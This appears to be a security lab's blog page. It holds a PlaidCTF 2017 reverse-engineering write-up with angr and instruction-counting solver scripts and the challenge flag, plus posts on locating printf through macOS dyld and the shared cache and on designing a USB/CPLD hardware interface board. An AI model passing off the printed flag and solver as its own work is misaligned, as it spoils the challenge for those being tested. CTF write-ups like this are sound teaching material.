Posts
PlaidCTF 2017 - no_mo_flo writeup (RE)
Can you go with the flow?
no_mo_flo
is a reverse engineering challenge from this year’s PlaidCTF. It’s a 64-bit executable that reads 32 characters from stdin, and tells you if this is the correct flag or not (classic). Opening it in IDA reveals that it takes the input and breaks it into two 16-byte buffers:
for ( i = 0; i <= 15; ++i ) { v5[i] = buf[2 * i]; v6[i] = buf[2 * i + 1]; }
It will then register a SIGFPE handler and trigger divisions by 0. When triggered, the handler will emulate jumps depending on $rflags, $r10, and $r11.
The SIGFPE handler looks like this
int __fastcall sigfpe_handler(__int64 a1, siginfo_t *a2, ucontext_t *ctx) { greg_t reg_r11; greg_t reg_eflags; greg_t reg_r10; char *str; if ( custom_flow_enabled ) { reg_r10 = ctx->uc_mcontext.gregs[REG_R10]; reg_eflags = ctx->uc_mcontext.gregs[REG_EFL]; reg_r11 = ctx->uc_mcontext.gregs[REG_R11]; switch ( reg_r11 ) { case CUSTOM_JMP: reg_r11 = custom_jmp(reg_r10); break; case CUSTOM_JNL: reg_r11 = custom_jnl(reg_r10, reg_eflags); break; case CUSTOM_JNG: reg_r11 = custom_jng(reg_r10, reg_eflags); break; case CUSTOM_JG: reg_r11 = custom_jg(reg_r10, reg_eflags); break; case CUSTOM_JL: reg_r11 = custom_jl(reg_r10, reg_eflags); break; case CUSTOM_JNE: reg_r11 = custom_jne(reg_r10, reg_eflags); break; case CUSTOM_JE: reg_r11 = custom_je(reg_r10, reg_eflags); break; default: break; } zero = 1LL; custom_flow_enabled = 0LL; } else { reg_r11 = sigaction(8, 0LL, 0LL); if ( (signed int)reg_r11 < 0 ) { str = strerror(errno); reg_r11 = printf("sigaction install fail %s\n", str); } } return reg_r11; }
As we can see,
$r11
is used as an opcode, and $r10
to store the jump value. If we look at the function called inside the switch, we have a reimplementation of the x86 opcodes, for example with jne:__int64 custom_jne(__int64 reg_r10, __int64 reg_eflags) { if (reg_eflags & X86_EFLAGS_ZF) custom_jmp_to = reg_r10; else custom_jmp_to = custom_jmp_from + 56; return custom_jmp_to; }
The code that triggers the
SIGFPE
handler looks like this:.text:0000000000400F18 check_odd_bytes: ; CODE XREF: main+AA .text:0000000000400F18 sub rsp, 8 .text:0000000000400F1C mov esi, 1 .text:0000000000400F21 mov eax, 0 .text:0000000000400F26 mov edx, eax .text:0000000000400F28 shl edx, 2 .text:0000000000400F2B movsxd rdx, edx .text:0000000000400F2E mov rax, rdi .text:0000000000400F31 add rax, rdx .text:0000000000400F34 mov rdx, rax .text:0000000000400F37 mov eax, [rdx] .text:0000000000400F39 mov edx, eax .text:0000000000400F3B sub edx, 3 .text:0000000000400F3E mov eax, edx .text:0000000000400F40 cmp eax, 40h .text:0000000000400F43 lea r10, check_odd_byte_1 .text:0000000000400F4B mov r11, CUSTOM_JNE .text:0000000000400F52 mov dword ptr ds:custom_flow_enabled, 1 .text:0000000000400F5D mov ds:custom_save_rax, rax .text:0000000000400F65 mov rax, 0 .text:0000000000400F6C mov ds:custom_save_rdx, rdx .text:0000000000400F74 lea rdx, loc_400F7B .text:0000000000400F7B .text:0000000000400F7B loc_400F7B: ; DATA XREF: check_odd_bytes+5C .text:0000000000400F7B mov ds:custom_jmp_from, rdx .text:0000000000400F83 cdq .text:0000000000400F84 idiv ds:zero .text:0000000000400F8C mov ds:zero, 0 .text:0000000000400F98 mov rax, ds:custom_save_rax .text:0000000000400FA0 mov rdx, ds:custom_save_rdx .text:0000000000400FA8 mov r11, ds:custom_jmp_to .text:0000000000400FB0 jmp r11 .text:0000000000400FB3 mov esi, 0 .text:0000000000400FB8 lea r10, check_odd_byte_1 .text:0000000000400FC0 mov r11, CUSTOM_JMP .text:0000000000400FC7 mov dword ptr ds:custom_flow_enabled, 1 .text:0000000000400FD2 mov ds:custom_save_rax, rax .text:0000000000400FDA mov rax, 0 .text:0000000000400FE1 mov ds:custom_save_rdx, rdx .text:0000000000400FE9 lea rdx, loc_400FF0 .text:0000000000400FF0 .text:0000000000400FF0 loc_400FF0: ; DATA XREF: .text:0000000000400FE9 .text:0000000000400FF0 mov ds:custom_jmp_from, rdx .text:0000000000400FF8 cdq .text:0000000000400FF9 idiv ds:zero .text:0000000000401001 mov ds:zero, 0 .text:000000000040100D mov rax, 
ds:custom_save_rax .text:0000000000401015 mov rdx, ds:custom_save_rdx .text:000000000040101D mov r11, ds:custom_jmp_to .text:0000000000401025 jmp r11
If we look a little inside it, this roughly translates into:
check_odd_bytes: ; CODE XREF: main+AA sub rsp, 8 mov esi, 1 mov eax, 0 mov edx, eax shl edx, 2 movsxd rdx, edx mov rax, rdi add rax, rdx mov rdx, rax mov eax, [rdx] mov edx, eax sub edx, 3 mov eax, edx cmp eax, 40h jne check_odd_byte_1 ; Here is the change mov esi, 0 jmp check_odd_byte_1 ; and the second one
Two main functions will then be called,
sub_4006c6
and sub_400f18
, that will respectively verify the first buffer and the second one. Two nice solving techniques are broken by this scheme: symbolic analysis (like angr) is very hard with stuff like signal handlers, and instruction counting is impossible since characters are not checked sequentially (here, they are checked two by two, the even ones, then the odd ones). While gaby was reversing and simplifying the jump handling to NOP out the divisions by 0 (see above), he figured out that the first function was not using the handler at all. So I tried to launch
angr
on the first function only, and managed to get the first half of the flag like this:#!/usr/bin/env python2 import angr from simuvex.procedures.stubs.UserHook import UserHook p = angr.Project('no_flo_f51e2f24345e094cd2080b7b690f69fb') # You win find = 0x4027ce # You lose main = 0x40272e # Basic blocks that get eax to be reset in the first function # (see get_basic_blocks.py) avoid = (0x4027f8, 0x40071d, 0x40077a, 0x4007d7, 0x400834, 0x400894, 0x4008f4, 0x400950, 0x4009a8, 0x400a09, 0x400a6f, 0x400ac7, 0x400b24, 0x400b81, 0x400bd9, 0x400c31, 0x400c8e, 0x400ce6, 0x400d3e, 0x400d96, 0x400df2, 0x400e4a, 0x400ea0, 0x400eeb) flag_addr = 0 def read(state): state.regs.rax = 32 global flag_addr flag_addr = state.regs.rsi for i in range(31): if i % 2 == 0: # We are interested by the bytes that go into the first function state.mem[state.regs.rsi + i].char = state.se.BVS('c', 8) else: if i > 4 and i < 31: # Other are put to '`' to be computed later with # v0lt (see solve2.py) state.mem[state.regs.rsi + i].char = '`' elif i == 1: state.add_constraints(state.memory.load(flag_addr, 5) == int("PCTF{".encode("hex"), 16)) state.mem[state.regs.rsi + 31].char = '}' def clear_rax(state): state.regs.rax = 0 def do_nothing(state): # There might be an angr builtin # no time to read the docs! pass # sighandler does nothing p.hook(0x4027ba, angr.Hook(UserHook, user_func=do_nothing, length=5)) # read p.hook(0x40274a, angr.Hook(UserHook, user_func=read, length=5)) # second function is completely bypassed for now p.hook(0x4027d1, angr.Hook(UserHook, user_func=clear_rax, length=(0x4027e0 - 0x4027d1))) init = p.factory.blank_state(addr=main) pgp = p.factory.path_group(init) ex = pgp.explore(find=find, avoid=avoid) # Print half the flag to pipe it into v0lt print(ex.found[0].state.se.any_str(ex.found[0].state.memory.load(flag_addr, 32)))
Basic blocks’ addresses from the previous script were dumped from IDA with this:
from idautils import * from bisect import * START = 0x4006c6 END = 0x400f13 # From https://reverseengineering.stackexchange.com/a/1648/11827 class BBWrapper(object): def __init__(self, ea, bb): self.ea_ = ea self.bb_ = bb def get_bb(self): return self.bb_ def __lt__(self, other): return self.ea_ < other.ea_ class BBCache(object): def __init__(self, f): self.bb_cache_ = [] for bb in idaapi.FlowChart(f): self.bb_cache_.append(BBWrapper(bb.startEA, bb)) self.bb_cache_ = sorted(self.bb_cache_) def find_block(self, ea): i = bisect_right(self.bb_cache_, BBWrapper(ea, None)) if i: return self.bb_cache_[i-1].get_bb() else: return None bb_cache = BBCache(idaapi.get_func(START)) for func in Functions(START, END): addr = func while addr < END: disasm = GetDisasm(addr) if "mov" in disasm and "r8d, 0" in disasm: print("{0}".format(hex(bb_cache.find_block(addr).startEA))) decoded = DecodeInstruction(addr) addr += decoded.size if decoded else 1
angr runs for less than 10 seconds and gives us half the flag:
p1kachu@GreenLabOfGazon:no_mo_flow$ ./solve1.py PCTF{`0`f`0`_`0`l`k`_`h`h`l`_`0} p1kachu@GreenLabOfGazon:no_mo_flow$
And now that we have this, we can “bruteforce” the other half using instruction counting, since we will always pass the first check (the even characters)!
Using
v0lt
, we are able to get the second half of the flag:#!/usr/bin/env python3 from v0lt import * # Get half the flag from angr first_half = input() # Create an instruction counting instance that reads from stdin a password # of 32 chars, and try to recover the other half of it ic = InstructionCounter("/home/p1kachu/Desktop/tools/pin/", "/home/p1kachu/no_flo_f51e2f24345e094cd2080b7b690f69fb", binary_args=" &> /dev/null", length=32, input_form=InputForm.STDIN, fixed_chars=first_half) # ¯\_(ツ)_/¯ flag = ic.Accurate();
And, a little while later, the Russian Anthem was played ;)
p1kachu@GreenLabOfGazon:Downloads$ ./solve1.py | ./solve2.py [+]SUCCESS char known: P -> P [+]SUCCESS char known: C -> PC [+]SUCCESS char known: T -> PCT [+]SUCCESS char known: F -> PCTF [+]SUCCESS char known: { -> PCTF{ [+]SUCCESS char guessed: n -> PCTF{n [+]SUCCESS char known: 0 -> PCTF{n0 [+]SUCCESS char guessed: _ -> PCTF{n0_ [+]SUCCESS char known: f -> PCTF{n0_f [+]SUCCESS char guessed: l -> PCTF{n0_fl [+]SUCCESS char known: 0 -> PCTF{n0_fl0 [+]SUCCESS char guessed: ? -> PCTF{n0_fl0? [+]SUCCESS char known: _ -> PCTF{n0_fl0?_ [+]SUCCESS char guessed: m -> PCTF{n0_fl0?_m [+]SUCCESS char known: 0 -> PCTF{n0_fl0?_m0 [+]SUCCESS char guessed: _ -> PCTF{n0_fl0?_m0_ [+]SUCCESS char known: l -> PCTF{n0_fl0?_m0_l [+]SUCCESS char guessed: i -> PCTF{n0_fl0?_m0_li [+]SUCCESS char known: k -> PCTF{n0_fl0?_m0_lik [+]SUCCESS char guessed: e -> PCTF{n0_fl0?_m0_like [+]SUCCESS char known: _ -> PCTF{n0_fl0?_m0_like_ [+]SUCCESS char guessed: a -> PCTF{n0_fl0?_m0_like_a [+]SUCCESS char known: h -> PCTF{n0_fl0?_m0_like_ah [+]SUCCESS char guessed: _ -> PCTF{n0_fl0?_m0_like_ah_ [+]SUCCESS char known: h -> PCTF{n0_fl0?_m0_like_ah_h [+]SUCCESS char guessed: 3 -> PCTF{n0_fl0?_m0_like_ah_h3 [+]SUCCESS char known: l -> PCTF{n0_fl0?_m0_like_ah_h3l [+]SUCCESS char guessed: l -> PCTF{n0_fl0?_m0_like_ah_h3ll [+]SUCCESS char known: _ -> PCTF{n0_fl0?_m0_like_ah_h3ll_ [+]SUCCESS char guessed: n -> PCTF{n0_fl0?_m0_like_ah_h3ll_n [+]SUCCESS char known: 0 -> PCTF{n0_fl0?_m0_like_ah_h3ll_n0 [+]SUCCESS char known: } -> PCTF{n0_fl0?_m0_like_ah_h3ll_n0} [+]SUCCESS pass found: PCTF{n0_fl0?_m0_like_ah_h3ll_n0} p1kachu@GreenLabOfGazon:no_mo_flow$ ./no_flo_f51e2f24345e094cd2080b7b690f69fb PCTF{n0_fl0?_m0_like_ah_h3ll_n0} Good flow!! p1kachu@GreenLabOfGazon:no_mo_flow$
flag: PCTF{n0_fl0?_m0_like_ah_h3ll_n0}
This was nice, because we could clearly see that the binary had been made such that these kinds of techniques would not work! Almost no reversing was necessary for this (even if we did a lot before figuring this out). A little bit of hacking never hurts ;) Thanks PPP!
You can find the binary and scripts here
LSE Week 2017 Announcement
For the seventh year, we are going to give a 3 day conference to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
All details are on the main page of the event: LSE Summer Week 2017
Playing with Mach-O binaries and dyld
One cool way to get your hands dirty when discovering something is to try to make it do simple stuff in some stupid/overkill way.
When I first had “fun” with the Linux ELF format, I was told to call printf without using it directly, by finding which address to call from inside the binary. For this, one would start from the mapped program header, find the
r_debug
structure which would give the program’s link map containing the mapped libc’s base address. From it, one would find printf
by iterating over the library’s symbol table to find where it is, before calling it. No syscalls allowed, so everything must come from the process’s own memory and structures. Recently I wanted to take a closer look at macOS, and decided to try the same thing with Mach-O binaries. This post will be a summary for me to remember, and for anybody who might want to learn something about macOS in general. I will not re-explain what already exists on other websites; I’ll just link to them instead.
Prerequisites
First things first, we are looking for printf, from the libc. To find it, just write a simple program, and open gdb. There are multiple ways to determine which library we are looking for, but using
info sharedlibrary
and determining in which range falls printf
is one of the simplest. In our case, we care about /usr/lib/system/libsystem_c.dylib
. This binary is what
file
calls a Mach-O universal binary
, which in fact is a wrapper around multiple Mach-Os. Also called Fat binaries
in the old days, they were used to mix x86 and PPC binaries in a single blob. Now, it ships libraries for both 32 and 64 bits architectures.p1kachu@OrangeLabOfSun:osx$ file libsystem_c.dylib help/libsystem_c.dylib: Mach-O universal binary with 2 architectures: [x86_64: Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|NO_REEXPORTED_DYLIBS|APP_EXTENSION_SAFE>] [i386: Mach-O i386 dynamically linked shared library, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|NO_REEXPORTED_DYLIBS|APP_EXTENSION_SAFE>]
A universal binary consists of a fat binary header, and multiple Mach-Os. So we’ll only take a look at one of the Mach-O, the one used by our system (in our case, the first one). Here is, however, an overview of the format:
Finding the libc
Only the corresponding Mach-O will be mapped in memory, so that’s what we are going to look for in our process’s address space. We first need to understand how the dynamic linker maps it. Let’s take a look at
/usr/include/mach-o/*
to try to find some information. The interesting stuff lies in dyld_images.h
and loader.h
. We see that the structure dyld_images.h:dyld_all_image_infos
has two interesting fields: a pointer (infoArray
) to an array of struct dyld_image_info
, which gives us every mapped binary in memory, and infoArrayCount
which gives the number of binaries in the array. We can thus iterate over these structures to find the libsystem_c.dylib
address in memory. Here are the important parts from
dyld_images.h
(macOS Sierra). Comments have been moved/reduced for more readability.struct dyld_image_info { /* base address image is mapped into */ const struct mach_header* imageLoadAddress; /* path dyld used to load the image */ const char* imageFilePath; /* time_t of image file */ uintptr_t imageFileModDate; // ... }; // ... /* internal limit */ #define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8 struct dyld_all_image_infos { uint32_t version; /* 1 in Mac OS X 10.4 and 10.5 */ uint32_t infoArrayCount; const struct dyld_image_info* infoArray; dyld_image_notifier notification; bool processDetachedFromSharedRegion; /* Mac OS X 10.6, iPhoneOS 2.0 and later */ bool libSystemInitialized; const struct mach_header* dyldImageLoadAddress; /* Mac OS X 10.6, iPhoneOS 3.0 and later */ void* jitInfo; /* Mac OS X 10.6, iPhoneOS 3.0 and later */ const char* dyldVersion; const char* errorMessage; uintptr_t terminationFlags; /* Mac OS X 10.6, iPhoneOS 3.1 and later */ void* coreSymbolicationShmPage; /* Mac OS X 10.6, iPhoneOS 3.1 and later */ uintptr_t systemOrderFlag; /* Mac OS X 10.7, iPhoneOS 3.1 and later */ uintptr_t uuidArrayCount; const struct dyld_uuid_info* uuidArray; /* only images not in dyld shared cache */ /* Mac OS X 10.7, iOS 4.0 and later */ struct dyld_all_image_infos* dyldAllImageInfosAddress; /* Mac OS X 10.7, iOS 4.2 and later */ uintptr_t initialImageCount; /* Mac OS X 10.7, iOS 4.2 and later */ uintptr_t errorKind; const char* errorClientOfDylibPath; const char* errorTargetDylibPath; const char* errorSymbol; /* Mac OS X 10.7, iOS 4.3 and later */ uintptr_t sharedCacheSlide; /* Mac OS X 10.9, iOS 7.0 and later */ uint8_t sharedCacheUUID[16]; /* (macOS 10.12, iOS 10.0 and later */ uintptr_t sharedCacheBaseAddress; uint64_t infoArrayChangeTimestamp; const char* dyldPath; mach_port_t notifyPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; #if __LP64__ uintptr_t reserved[13-(DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT/2)]; #else uintptr_t reserved[12-DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; #endif };
Looking at this structure afterwards, one can notice that some of its other fields could have been quite useful for our purpose!
However, we first have to find its address in memory. The function
/usr/include/mach/task.h:task_info
does exactly this, but uses a mach port
, which is a kernel-provided inter-process communication mechanism. It’s not exactly a syscall, but still, it’s a little bit like cheating. I don’t think there is any reliable way of doing it without (as of Yosemite at least). Phew! We are now able to get the base address of
libsystem_c.dylib
:static char *find_libc(void) { // Get DYLD task infos struct task_dyld_info dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; kern_return_t ret; ret = task_info(mach_task_self_, TASK_DYLD_INFO, (task_info_t)&dyld_info, &count); if (ret != KERN_SUCCESS) { return NULL; } // Get image array's size and address mach_vm_address_t image_infos = dyld_info.all_image_info_addr; struct dyld_all_image_infos *infos; infos = (struct dyld_all_image_infos *)image_infos; uint32_t image_count = infos->infoArrayCount; struct dyld_image_info *image_array = infos->infoArray; // Find libsystem_c.dylib among them struct dyld_image_info *image; for (int i = 0; i < image_count; ++i) { image = image_array + i; // Find libsystem_c.dylib's load address if (strstr(image->imageFilePath, "libsystem_c.dylib")) { return (char*)image->imageLoadAddress; } } }
Getting printf
Right. So now we have the binary in memory, let’s finally take a look at the Mach-O format. A good introduction has already been written here, so let’s not dive in too deep and directly look for what interests us, accessing the symbol table. Thus, we are looking for the
LC_SYMTAB
command, which will give us the strtab and symtab offsets on which we will iterate to find printf. The process of looking up the name of a given entry in the lazy or non-lazy pointer tables looks like this:
Analysing it with jtool gives us an overview on what we are supposed to find:
p1kachu@OrangeLabOfSun:osx$ ./jtool.ELF64 -arch x86_64 -l libsystem_c.dylib [...] LC 05: LC_SYMTAB Symbol table is at offset 0x9da70 (645744), 2372 entries String table is at offset 0xa7708 (685832), 32264 bytes [...]
However, the values recovered from memory are quite different:
P1kachu@GreyLabOfSteel:~/D/L/W/c/osx$ ./get_symcmd symoff: 0x134596ef stroff: 0x141ad9f4
And then began the
SIGSEGV
ballet. Something was definitely off.
The shared cache
Let’s take a step back to late 2009, with iOS 3.1. One change in the way iOS handled libraries was introduced by means of the
Dyld shared cache
, which combines all system (private and public) libraries into a big cache file to improve performance. On macOS, the same thing happened. The shared caches live in /private/var/db/dyld/
and regroups a lot of libraries (~400 for Yosemite and ~670 for Sierra, as for the x86_64 versions). The file format isn’t documented and changes between versions, so we must trick a little bit. Some informations about it can be retrieved using jtool again:p1kachu@OrangeLabOfSun:osx$ ./jtool.ELF64 -h dyld_shared_cache_x86_64h_yosemite File is a shared cache containing 414 images (use -l to list) Header size: 0x70 bytes Got gap of -8 bytes: 3 mappings starting from 0x68. 414 Images starting from 0xc8 mapping r-x/r-x 251MB 7fff80000000 -> 7fff8fb31000 (0-fb31000) mapping rw-/rw- 38MB 7fff70000000 -> 7fff72604000 (fb31000-12135000) mapping r--/r-- 75MB 7fff8fb31000 -> 7fff9466d000 (12135000-16c71000) DYLD base address: 7fff5fc00000 Local Symbols: 0x0-0x0 (0 bytes) Code Signature: 0x16c71000-0x16e38a07 (1866247 bytes) Slide info: 0x16ba7000-0x16c71000 (827392 bytes) Slide Info version 1, TOC offset: 24, count 9732, entries: 6309 of size 128 p1kachu@OrangeLabOfSun:osx$ ./jtool.ELF64 -h dyld_shared_cache_x86_64h_sierra File is a shared cache containing 675 images (use -l to list) Header size: 0x70 bytes Got gap of 40 bytes: 0xf8 0x00 0x00 0x00 0x00 0x00 0x5790 0x00 0x29d 0x00 3 mappings starting from 0x98. 675 Images starting from 0xf8 mapping r-x/r-x 424MB 7fff70000000 -> 7fff8a824000 (0-1a824000) mapping rw-/rw- 75MB 7fff8e824000 -> 7fff933a7000 (1a824000-1f3a7000) mapping r--/r-- 118MB 7fff973a7000 -> 7fff9ea3c000 (1f3a7000-26a3c000) DYLD base address: 0 Local Symbols: 0x0-0x0 (0 bytes) Code Signature: 0x26a3c000-0x26f14000 (5079040 bytes) Slide info: 0x1f3a7000-0x1f3b1000 (40960 bytes) Slide Info version 2, TOC offset: 4096, count 40, entries: 38702 of size 0
Memory layout subtlety
On Yosemite (and probably other versions that I didn’t look at), the cache memory mapping differs from the file layout: as can be seen using jtool’s output above, the
TEXT
mapping is after the DATA
, while it is the opposite in the file layout. This was put back to normal between Yosemite and Sierra.DYLD SHARED CACHE MAPPINGS ON YOSEMITE * ======================================== (*): Without ASLR slide ---------------------- 0x7fff70000000 | | | | | | | | | RW- | | | | | | | |----------------------| 0x7fff70000000 + [RW-].size | Junk | |----------------------| 0x7fff80000000 | Cache Header | |----------------------| | | | R-X | | | | ... | | libsystem_c.dylib | | ... | | | | | |----------------------| 0x7fff80000000 + [R-X].size | | | | | | | R-- | | | | | | | | | ---------------------- 0x7fff80000000 + [R-X].size + [R--].size cache.base = [R-X].address + [R-X].size - [R--].offset
Among these cached libraries is our
libsystem_c
, and thus we simply understand that the {str,sym}tab offsets are relative to the beginning of the cache file. Finding it on Yosemite was not trivial without issuing syscalls, and I thus went for the stupid way: I first found the loaded library with the smallest load address (the first one contained in the shared cache), and walked backwards through memory until finding the shared cache magic string (
dyld_v1 x86_64\0
). On Sierra, however, one can observe that the
dyld_all_image_infos
structure contains a nice field named sharedCacheBaseAddress
. I used it to avoid memcmp
ing more memory. With this, we can find the symtab, iterate over its entries and check the corresponding strings, looking for
_printf
.
Conclusion
The final code, compatible with at least Yosemite and Sierra, is available here.
I may have skipped some information. I read way too much from different sources to be able to put everything down. If anything is unclear, feel free to ping me by mail or twitter.
Interesting auxiliary stuff
Shared cache and ASLR
The shared cache is loaded in memory at boot and is the same for every process. Even if affected by ASLR, it will not be re-randomized on a per program basis, and thus any program leaking addresses from it actually leaks system-wide addresses, which is nice!
Links
- Code for calling printf
- Slides of the corresponding Lightning talk
- Dynamic Symbol table duel - ELF vs Mach-O
- Mach-O executables
/usr/include/mach-o/*
One Device to drive them all
Prologue
Three Devices for logic analysis of passively captured traces,
Seven for inter-chip communication driven by hardwired interfaces,
Nine for in-circuit debugging limited to specific purpose,
One for complex hardware hacking scenarios.
Three tinkerers took those words as they are. Overthrown by the complexity implied by the multiplicity of inefficient tools, they thought that time had come to undertake this problem from another angle.
All they needed was a simple way to manipulate the exotic devices that they required for their projects. Manufactured by foreign organizations, devices referred here were designed to fulfill a predefined purpose and were intended to be used as black boxes. Without any knowledge of the internal mechanisms involved in their operations, it was conceivable to integrate them if they were in the kind of environment that they were promised to.
But those tinkerers thought differently. Their situation was mostly complicated by the fact that they had already acquired a good control of their personal computers that they considered as their main and perfect workstation. Well defined and roughly understood, they were too stubborn to learn another way to work as they unanimously decided that this method was the most effective and compliant with the rest of their work.
So instead of reworking their methodology, they agreed that defining a third device whose only purpose was to handle the interfacing between the workstation and the device under test was inescapable. The first member of the group asked the others what options were available to fit this position.
The second one said that he already made an intensive usage of the Arduino for that. Providing an easy access and control of its GPIO and some hardwired bus controllers, it was suitable for the most simple cases.
The third one discussed the merits of the Bus Pirate from Dangerous Prototype. Mature and widely-used, this tool provided a direct control of its interface via USB without the need to develop a specific firmware to be actually used.
The first one replied to these proposals that they had a common issue: they simply performed the communication with the host by using an interface based on the translation of USB to UART running at 115200 baud. For him, this prohibited fine-grained configuration and thus limited the full capabilities provided by the USB protocol.
They all agreed on this last point and started to work on a first prototype of their response to this situation.
It was based on a STM32F072 microcontroller and mapped SPI, I2C, UART and CAN signals to physical headers. As this chip was able to drive USB signals, a USB mini-connector was directly connected to it.
Concerning the software side, one interesting idea here was to expose the hardware interfaces using the corresponding subsystem in the Linux kernel. Even though these subsystems were mostly used to describe on-chip interfaces, adapting them to wrap up the USB functions was feasible. For instance, the SPI exposed by the device could be manipulated as a regular spidev.
Although the concept of such a board was appealing at the time, limitations quickly appeared. First of all, most of the USB protocol had to be implemented in software on the STM32F072, which led to a significant overhead on each USB transaction. Secondly, fully implementing the host driver in kernel space implied a rigid configuration and was error-prone if not implemented correctly. Finally, the global stability of the STM32F072 MCU was quite poor, especially during a development phase where on-chip debugging had to be frequently used.
One year passed and no one was actually enthusiastic about using this stillborn project in a real context. The first one, whose credibility was at its lowest point, found the courage to propose to the two others that they rethink the project from the beginning. And they accepted, against all odds.
This write-up must be considered as the collection of thoughts that led them to the design and the manufacture of a second version of this small, unpretentious, and unfinished electronic board.
Chapter I: Forging the One Device
The first step for them was to clearly define how and what could make the second version of the board better than the previous one. The main issue was related to the lack of flexibility of the design and they wondered how they could handle a protocol not supported by the microcontroller they used.
Then they decided to take a look at the wide range of Programmable Logic Devices available nowadays. As a first prototype, a CPLD appeared to be the best choice for such an application. Compared to a regular FPGA, these non-volatile PLDs were cheaper and required a much simpler configuration circuit. They also thought that the prototype was designed only to prove a concept and that moving to a more powerful FPGA for the next versions was conceivable.
Section I: From Ink…
From a high-level point of view, the board had been specified to expose a reasonable number of IOs directly connected to a controller, here an Altera Max V CPLD. As the flaky soft USB implementation of the previous version was quite inconvenient to maintain and to keep reliable, the job here had been assigned to a well-known and solid dedicated USB controller: the FX2LP from Cypress Semiconductor. This highly integrated USB 2.0 microcontroller implemented most of the protocol logic in silicon and only burdened its integrated 8051’s firmware with the high-level configuration aspect of USB.
And then came the question about the communication between the USB controller and the IO controller. The FX2LP embedded a powerful mechanism to forward the content of a USB endpoint to a hardware FIFO without any interaction with the internal 8051. The words of these EP buffers could then be dequeued by an external component using a hardware interface.
However, this one was defined by a 16-bit data bus and 6 control signals, which was quite pin-consuming for the CPLD they chose. Fortunately, another mechanism offered by the FX2LP allowed the programming of a custom protocol to transmit and receive these data with the external world: the General Programmable Interface (GPIF). As for the regular FIFO interface, this hardware unit was almost completely independent from the 8051. The firmware was only responsible for programming the hardware state-machines used to represent the waveforms of a one-word transmission.
In their case, they chose to allocate 8 wires for the bidirectional data bus, 3 control signals driven by the USB controller and 2 ‘ready’ signals initiated by the IO controller. At that point, none of them had actually thought about the exact shape of the waveforms and the purpose of the control signals but planned to consider that once the first board would be fully manufactured.
The USB device interface was composed of 3 endpoints. The endpoint 0 acted as a regular control endpoint and was used to transfer small requests. Meanwhile, endpoints 2 and 6 were dedicated to bulk transmissions and receptions respectively. The two last were directly connected to the internal FIFO while the first one was completely handled by the 8051.
To power these components, the 5V supplied by the USB was first stepped down to 3.3V using a low-dropout voltage regulator to power the USB controller and the IO banks of the CPLD, while a 1.8V regulator powered the CPLD’s internal logic.
The main clock was managed by the FX2LP. Connected to a 24MHz crystal, the internal PLL was configured by the 8051 firmware, allowing a CPU clock frequency of 48MHz, 24MHz or 12MHz. As the output of the phase-locked loop was also exposed outside the USB controller by the CLKOUT pin, the CPLD used it as a system clock.
The GPIF unit had a dedicated clock that could be fed internally or imposed by an external device. All operations on this interface were aligned to this signal. To avoid dealing with multiple clock domains in the CPLD, they arranged to drive the IFCLK signal from the IO controller at half the frequency of the system clock.
An I2C EEPROM had been connected to the USB controller in order to store its firmware in a persistent way. The internal reset logic of the FX2LP was designed to scan the I2C bus for an EEPROM from which a valid firmware could be loaded. Once the program was fully copied to internal RAM, no operations were performed on this bus.
After several tries, they finally validated the following schematic:
Section II: …To Copper
Once the design was approved, the next step consisted of drawing the printed circuit board. Two layers were enough to route the entire netlist within a surface of 5x5cm.
The top layer was dedicated to voltage regulation, CPLD, connectors and a couple of switches and LEDs. Meanwhile, the bottom one contained the whole circuit required to make the USB controller work: crystal, EEPROM, I2C pull-up resistors, …
IOs from the CPLD were exposed via 2 dual-row 20-pin female headers of 2.54mm pitch.
As the board was manually soldered, it was not conceivable for them to use BGA components for this prototype. So the 100-pin LQFP version of the CPLD had been used as well as the 56-pin SSOP package of the Cypress’s chip.
After hours of painful electrical tests, a first sample of a fully soldered board was born by the end of the Spring:
Chapter II: On Reprogrammability They Hoped
Although the physical board was ready, a firmware was still needed to make it work. The situation was more complex than just a simple binary located in a single ROM, as is the case for most boards of this category.
First of all, the firmware for the FX2LP had been implemented, which basically consisted of configuring the USB and the GPIF units of the chip. Nothing uncommon here: writing applications for this kind of microcontroller was quite easy as it was well-documented and tons of similar usages of this chip already existed and were publicly available. The code had been written in a couple of hours and no new features had been added since, as they decided to make the firmware serve only one purpose: translating USB data to the IO controller in the simplest and most lightweight way.
For them, most of the customizations that would be needed should be fully-implemented at the IO controller level. The real challenge here was to take advantage of the CPLD as a powerful and programmable IO controller.
One solution would be to base the CPLD’s design on a soft-processor: modifying IO’s behaviour would mean loading a new firmware into its RAM. Although this architecture was quite common when using an FPGA, it became more inconvenient when basing it on a CPLD due to the lack of memory blocks.
The second solution would be to generate and configure the design of the CPLD according to the user’s needs dynamically. As pursuing this concept using a regular hardware description language seemed almost impossible for them, they decided to fully base the design generation on Migen. This python module allowed the meta-programming of synchronous register transfer level design and handled the generation of a verilog file that could then be synthesised by the regular Altera’s toolchain.
Section I: Modularity And Modulation
They fully defined the architecture around the concept of modularity. To demonstrate how it would transpire in a real context, they took the example of a Pulse-Width Modulation interface.
The main principle of such a technique was to use a rectangular pulse wave whose pulse width was modulated, resulting in the variation of the average value of the waveform.
A possible implementation of a PWM module could be achieved by using a counter whose width defined the period of the signal and a digital comparator to generate the needed duty cycle.
In this case, the only signal that was likely exposed externally would be the output of the comparator, negated or not. Moreover, a ‘parameter’ of this circuit would be the left-input of the comparator and was typically the kind of signal that would be interesting to implement as a register writable from the host.
For their example, they also considered that the counter value could be watched from the host.
The ‘parameter’ signals were called ‘Control Registers’ and were intended to be readable and/or writable from the host while the signals that would be eligible to be mapped to a physical pin of the CPLD were called ‘IO Signals’.
In a more generic way, this kind of module, that they called ‘IO Module’, could always be represented according to the following template:
-
An internal logic block that could contain both combinational and sequential logic left to IO Module’s discretion.
-
‘Control Registers’ connected to an internal bus and used to watch and control the activity of the internal logic from the host.
-
‘IO Signals’ intended to interact with an external component and to be mapped to real pin.
